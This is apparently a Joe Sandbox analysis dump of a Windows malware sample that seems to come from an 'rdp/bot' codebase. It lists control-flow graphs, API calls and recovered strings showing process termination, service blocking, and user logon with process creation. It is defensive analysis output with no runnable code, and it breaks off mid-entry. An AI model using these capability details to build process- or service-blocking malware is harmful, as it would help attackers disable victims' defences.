strlen 9966->9968 9969 7ff7e3cec475 wcslen 9967->9969 9970 7ff7e3cec46e 9967->9970 9973 7ff7e3cec382 9968->9973 9969->9970 9975 7ff7e3ceb420 9970->9975 9972 7ff7e3ceca67 9973->9972 9974 7ff7e3ceb3e7 fputc 9973->9974 9974->9973 9985 7ff7e3cf0047 9975->9985 9977 7ff7e3ceb44f 9978 7ff7e3ceb3e7 fputc 9977->9978 9983 7ff7e3ceb462 9977->9983 9978->9977 9979 7ff7e3ceb4d1 9980 7ff7e3ceb4ed 9979->9980 9982 7ff7e3ceb3e7 fputc 9979->9982 9980->9973 9981 7ff7e3cf0047 4 API calls 9981->9983 9982->9979 9983->9979 9983->9981 9984 7ff7e3ceb3e7 fputc 9983->9984 9984->9983 9986 7ff7e3cf0053 9985->9986 9987 7ff7e3cf0058 ___mb_cur_max_func ___lc_codepage_func 9985->9987 9986->9987 9988 7ff7e3ceffd0 2 API calls 9987->9988 9989 7ff7e3cf0080 9988->9989 9989->9977 10792 7ff7e3cec631 10794 7ff7e3cec64d 10792->10794 10793 7ff7e3cec6c3 10801 7ff7e3ceb5da 10793->10801 10794->10793 10796 7ff7e3cec6c8 10794->10796 10805 7ff7e3cebdaf 10796->10805 10798 7ff7e3ceca67 10799 7ff7e3cec382 10799->10798 10800 7ff7e3ceb3e7 fputc 10799->10800 10800->10799 10802 7ff7e3ceb5f0 10801->10802 10803 7ff7e3ceb4fe fputc 10802->10803 10804 7ff7e3ceb646 10803->10804 10804->10799 10806 7ff7e3cebdc6 10805->10806 10810 7ff7e3cebf5e 10806->10810 10813 7ff7e3ceb3e7 fputc 10806->10813 10807 7ff7e3cebf9d 10809 7ff7e3ceb3e7 fputc 10807->10809 10808 7ff7e3ceb3e7 fputc 10808->10807 10811 7ff7e3cebfaa 10809->10811 10810->10807 10810->10808 10812 7ff7e3ceb3e7 fputc 10811->10812 10814 7ff7e3cebfbb 10812->10814 10813->10806 10816 7ff7e3ceb3e7 fputc 10814->10816 10817 7ff7e3cebfc1 10814->10817 10815 7ff7e3cec008 10818 7ff7e3cec054 10815->10818 10821 7ff7e3ceb3e7 fputc 10815->10821 10816->10814 10817->10815 10820 7ff7e3ceb3e7 fputc 10817->10820 10823 7ff7e3ceb420 5 API calls 10817->10823 10825 7ff7e3ceb64c 10817->10825 10822 7ff7e3ceb3e7 fputc 10818->10822 10820->10817 10821->10815 10824 7ff7e3cec068 10822->10824 10823->10817 10826 7ff7e3ceb666 10825->10826 10832 7ff7e3ceb68f 10825->10832 10830 7ff7e3cf026c 6 API calls 
10826->10830 10827 7ff7e3ceb706 10829 7ff7e3ceb3e7 fputc 10827->10829 10828 7ff7e3ceb6a7 10831 7ff7e3cf0047 4 API calls 10828->10831 10838 7ff7e3ceb6f2 10829->10838 10830->10832 10833 7ff7e3ceb6d5 10831->10833 10832->10827 10832->10828 10834 7ff7e3ceb6f4 10833->10834 10835 7ff7e3ceb6dc 10833->10835 10836 7ff7e3ceb3e7 fputc 10834->10836 10837 7ff7e3ceb3e7 fputc 10835->10837 10835->10838 10836->10838 10837->10835 10838->10817 9990 7ff7e3ce702f 9991 7ff7e3ce7057 wcslen 9990->9991 9992 7ff7e3ce704b 9990->9992 9991->9992 11372 7ff7e3ce212f 11373 7ff7e3ce21b6 11372->11373 11374 7ff7e3ce2159 CreateToolhelp32Snapshot 11372->11374 11377 7ff7e3ce14e2 6 API calls 11373->11377 11375 7ff7e3ce2175 Process32First 11374->11375 11376 7ff7e3ce2227 GetLastError 11374->11376 11379 7ff7e3ce22ff GetLastError 11375->11379 11401 7ff7e3ce21a6 11375->11401 11378 7ff7e3ce14e2 6 API calls 11376->11378 11394 7ff7e3ce21df 11377->11394 11378->11394 11380 7ff7e3ce230c 11379->11380 11381 7ff7e3ce14e2 6 API calls 11380->11381 11381->11401 11382 7ff7e3ce2888 CloseHandle 11384 7ff7e3ce28a3 11382->11384 11382->11394 11383 7ff7e3ce21f4 11386 7ff7e3ce14e2 6 API calls 11383->11386 11392 7ff7e3ce14e2 6 API calls 11384->11392 11387 7ff7e3ce2211 11386->11387 11388 7ff7e3ce24d3 OpenProcess 11390 7ff7e3ce24f4 TerminateProcess 11388->11390 11391 7ff7e3ce25a3 GetLastError 11388->11391 11389 7ff7e3ce24c2 strcmp 11389->11388 11389->11401 11397 7ff7e3ce2484 CloseHandle 11390->11397 11398 7ff7e3ce250a GetLastError 11390->11398 11395 7ff7e3ce14e2 6 API calls 11391->11395 11392->11387 11393 7ff7e3ce26ed Process32Next 11396 7ff7e3ce2704 GetLastError 11393->11396 11393->11401 11394->11383 11394->11384 11395->11401 11396->11401 11397->11401 11399 7ff7e3ce14e2 6 API calls 11398->11399 11399->11401 11400 7ff7e3ce14e2 6 API calls 11400->11401 11401->11382 11401->11388 11401->11389 11401->11393 11401->11397 11401->11400 11402 7ff7e3ce254b 11401->11402 9993 7ff7e3cedc2f 9994 7ff7e3cedc56 9993->9994 9995 7ff7e3cedc62 
9993->9995 9997 7ff7e3ceccd9 2 API calls 9994->9997 10001 7ff7e3cedb86 9994->10001 10003 7ff7e3cecacd 9995->10003 9997->10001 9998 7ff7e3cee2e0 9999 7ff7e3cee301 9998->9999 10000 7ff7e3ceccd9 2 API calls 9998->10000 10000->9999 10001->9998 10002 7ff7e3ceccd9 fputwc fwprintf 10001->10002 10002->10001 10004 7ff7e3cecae7 10003->10004 10005 7ff7e3cecafc 10004->10005 10008 7ff7e3cecb4c 10004->10008 10006 7ff7e3cecb27 fwprintf 10005->10006 10010 7ff7e3cecb04 fwprintf 10005->10010 10007 7ff7e3cecb39 10006->10007 10007->9994 10013 7ff7e3ceca90 fputwc 10008->10013 10016 7ff7e3cecb51 10008->10016 10010->10007 10011 7ff7e3cecb8f strlen 10018 7ff7e3cf026c 10011->10018 10012 7ff7e3cecbd9 10012->10007 10015 7ff7e3ceca90 fputwc 10012->10015 10013->10008 10015->10012 10016->10011 10016->10012 10017 7ff7e3ceca90 fputwc 10016->10017 10017->10016 10019 7ff7e3cf0282 ___mb_cur_max_func ___lc_codepage_func 10018->10019 10020 7ff7e3cf027d 10018->10020 10021 7ff7e3cf02bb 10019->10021 10020->10019 10024 7ff7e3cf0150 10021->10024 10025 7ff7e3cf018c 10024->10025 10026 7ff7e3cf0170 10024->10026 10025->10016 10026->10025 10027 7ff7e3cf0254 10026->10027 10029 7ff7e3cf01df IsDBCSLeadByteEx 10026->10029 10032 7ff7e3cf01aa 10026->10032 10027->10025 10028 7ff7e3cf021f MultiByteToWideChar 10027->10028 10028->10025 10030 7ff7e3cf0244 _errno 10028->10030 10029->10027 10029->10032 10030->10025 10031 7ff7e3cf01c6 MultiByteToWideChar 10031->10025 10031->10030 10032->10025 10032->10031 11403 7ff7e3ce292e 11404 7ff7e3ce2944 11403->11404 11405 7ff7e3ce2a53 11404->11405 11406 7ff7e3ce299e 11404->11406 11407 7ff7e3ce14e2 6 API calls 11405->11407 11408 7ff7e3ce2a87 11406->11408 11409 7ff7e3ce29a7 11406->11409 11422 7ff7e3ce29d5 11407->11422 11410 7ff7e3ce14e2 6 API calls 11408->11410 11411 7ff7e3ce2abb 11409->11411 11412 7ff7e3ce29bd strlen 11409->11412 11410->11422 11414 7ff7e3ce14e2 6 API calls 11411->11414 11413 7ff7e3ce2aef strcat 11412->11413 11412->11422 11415 7ff7e3ce2bec 11413->11415 11416 7ff7e3ce2b08 
strlen strlen 11413->11416 11414->11422 11420 7ff7e3ce3032 11415->11420 11421 7ff7e3ce2c1a 11415->11421 11415->11422 11417 7ff7e3ce2b38 strlen strcat 11416->11417 11416->11422 11418 7ff7e3ce2b74 11417->11418 11418->11415 11419 7ff7e3ce2b95 strlen strlen 11418->11419 11419->11415 11423 7ff7e3ce2bbc strlen strcat 11419->11423 11420->11422 11424 7ff7e3ce3041 CreateProcessA 11420->11424 11425 7ff7e3ce2c32 LogonUserA 11421->11425 11439 7ff7e3ce2ce5 11421->11439 11426 7ff7e3ce14e2 6 API calls 11422->11426 11436 7ff7e3ce2a3c 11422->11436 11423->11418 11427 7ff7e3ce3191 11424->11427 11428 7ff7e3ce3098 GetLastError 11424->11428 11429 7ff7e3ce2c63 GetLastError 11425->11429 11430 7ff7e3ce2d9d CreateProcessAsUserA 11425->11430 11426->11436 11435 7ff7e3ce14e2 6 API calls 11427->11435 11434 7ff7e3ce14e2 6 API calls 11428->11434 11431 7ff7e3ce14e2 6 API calls 11429->11431 11432 7ff7e3ce2dfc GetLastError 11430->11432 11433 7ff7e3ce2eed 11430->11433 11431->11421 11437 7ff7e3ce14e2 6 API calls 11432->11437 11438 7ff7e3ce14e2 6 API calls 11433->11438 11433->11439 11434->11420 11435->11436 11437->11439 11438->11439 11440 7ff7e3ce2f2d 11439->11440 11441 7ff7e3ce2f27 CloseHandle 11439->11441 11440->11422 11442 7ff7e3ce2f36 11440->11442 11441->11440 11442->11436 11443 7ff7e3ce14e2 6 API calls 11442->11443 11443->11436 10040 7ff7e3ceac27 10043 7ff7e3ceac4e 10040->10043 10041 7ff7e3ceac6f 10042 7ff7e3ceacb5 10042->10041 10045 7ff7e3ceacfb signal 10042->10045 10043->10041 10043->10042 10044 7ff7e3ceacdf signal 10043->10044 10044->10041 10044->10042 10045->10041 10839 7ff7e3cede28 10840 7ff7e3cede3e 10839->10840 10847 7ff7e3ced126 10840->10847 10842 7ff7e3cee2e0 10843 7ff7e3cee301 10842->10843 10844 7ff7e3ceccd9 2 API calls 10842->10844 10844->10843 10845 7ff7e3ceccd9 fputwc fwprintf 10846 7ff7e3cedb86 10845->10846 10846->10842 10846->10845 10848 7ff7e3ced137 10847->10848 10849 7ff7e3ced00f 6 API calls 10848->10849 10850 7ff7e3ced164 10849->10850 10851 7ff7e3ced186 10850->10851 10852 

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                    • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                    • API String ID: 3039259412-1782951725
                                    • Opcode ID: 6e9baee691a7f56f21bdd07bbdaf21b6c270e43383445d7bf84017090ebc1146
                                    • Instruction ID: 1771f2204068521a4264e28a06702349754b7e8c0903af5521841fc52251ef0c
                                    • Opcode Fuzzy Hash: 6e9baee691a7f56f21bdd07bbdaf21b6c270e43383445d7bf84017090ebc1146
                                    • Instruction Fuzzy Hash: 43D15E21A4C78381FBA0AB12E4503B9BAA0BB44744F904133DA4DA67F5DE7DE945D723
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                    • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                    • API String ID: 1025937399-1899507746
                                    • Opcode ID: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                    • Instruction ID: b9f8a85662ff99a06f78256079d0701aaf7308f9e40e8a4b9d69d797e8050618
                                    • Opcode Fuzzy Hash: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                    • Instruction Fuzzy Hash: 8AF14A51F8C71782FAF07756A490378BA94AF45B54FD00233C60EA62F5CE7DE881A227

                                    Control-flow Graph

                                    APIs
                                    Similarity
                                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                    • String ID:
                                    • API String ID: 3714283218-0
                                    • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                    • Instruction ID: 455a0688751c8791972cd63dbb945a518289fd44a51eeb42f8bf9759c2d7540c
                                    • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                    • Instruction Fuzzy Hash: 14513329A8864685EBD0BB12E860779EBE0AF44B44F855137CD0DA73F1DE3CE4609763

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                    • API String ID: 2897271634-4120527733
                                    • Opcode ID: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                    • Instruction ID: ad61715c2a0c55316088d65c239798af783427032aa40f830b940eef96726b3b
                                    • Opcode Fuzzy Hash: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                    • Instruction Fuzzy Hash: B9D18322A88A0791FA90BB56E850378AF91BF40795FD55233D90DB73F0DE3CE4569322

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _errno$fopenfwrite
                                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                    • API String ID: 1336347884-544371937
                                    • Opcode ID: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                    • Instruction ID: edbe0b80c426c4a37aaa9cd24e444dc92e80ea0e8879337cfdbaabf590098be6
                                    • Opcode Fuzzy Hash: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                    • Instruction Fuzzy Hash: 88518162A8864391FA90BB56D9503B8EB91AF40794FD84233D91DA73F0DF3CE5169332

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                    • API String ID: 3395718042-2291025694
                                    • Opcode ID: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                    • Instruction ID: 1e349780b27fa5f43144e0234d9cfa0ea85d5ddf858999501c63460fff3c59cf
                                    • Opcode Fuzzy Hash: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                    • Instruction Fuzzy Hash: 17516165E8C60382F7A07B42E4903B8DA91AF04744FD45233C50EA62F2DE7CE965E363

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                    • API String ID: 2747014929-530486279
                                    • Opcode ID: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                    • Instruction ID: 1720312d96d056508157fcdd2878870620ce6e5d0deab6309d6083de66d0d18a
                                    • Opcode Fuzzy Hash: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                    • Instruction Fuzzy Hash: 92817E11D9C30B81FAB0B712A950378BA605F00355FD40333D96EA66F2EE7DE995A323

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                    • API String ID: 1423203057-2746879330
                                    • Opcode ID: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
                                    • Instruction ID: a5b04b025db4de8cf3cfbd70045b9473ec159d1be8450e70ec71f4d00cc42f0e
                                    • Opcode Fuzzy Hash: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
                                    • Instruction Fuzzy Hash: 27A1E862A4D68281EAA0AB02E4507B9AF60BF40784FC44133DE4DA77F1DE7CE545D323

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                    • Instruction ID: 06d38f1e950c56cc0d6f9927208c1bdf852734f2828d8a729f1a2e4cc69e1d0f
                                    • Opcode Fuzzy Hash: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                    • Instruction Fuzzy Hash: E6517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                    • Instruction ID: e991e4db451810916b8586b3e360248dca809fc13ff2300b727b22a6d36fbb22
                                    • Opcode Fuzzy Hash: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                    • Instruction Fuzzy Hash: 4A517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                    • Instruction ID: 7641fa4252aa7a61dd2d02f230767f8ea40159cb3ec07ac30da3a1f4113ea915
                                    • Opcode Fuzzy Hash: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                    • Instruction Fuzzy Hash: E7517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                    • Instruction ID: df2d07691e31e107289425beadad6e5d04a1de34201d1caf282384b727ed9781
                                    • Opcode Fuzzy Hash: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                    • Instruction Fuzzy Hash: 85414F61A8864791FAA0AB42E9107B4ABA0BF00348FD44233DB4DA76F4DF7CE555D327

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                    • Instruction ID: d7bb5ce7ba0007ab5b191dc4a1f29cc7ede74b362d786f139ed4107c6adc5157
                                    • Opcode Fuzzy Hash: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                    • Instruction Fuzzy Hash: D5418261A8855391FAA0BB41E8107B4ABA0BF00348FD44233DA0D6A5F1DF7CE555D327

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
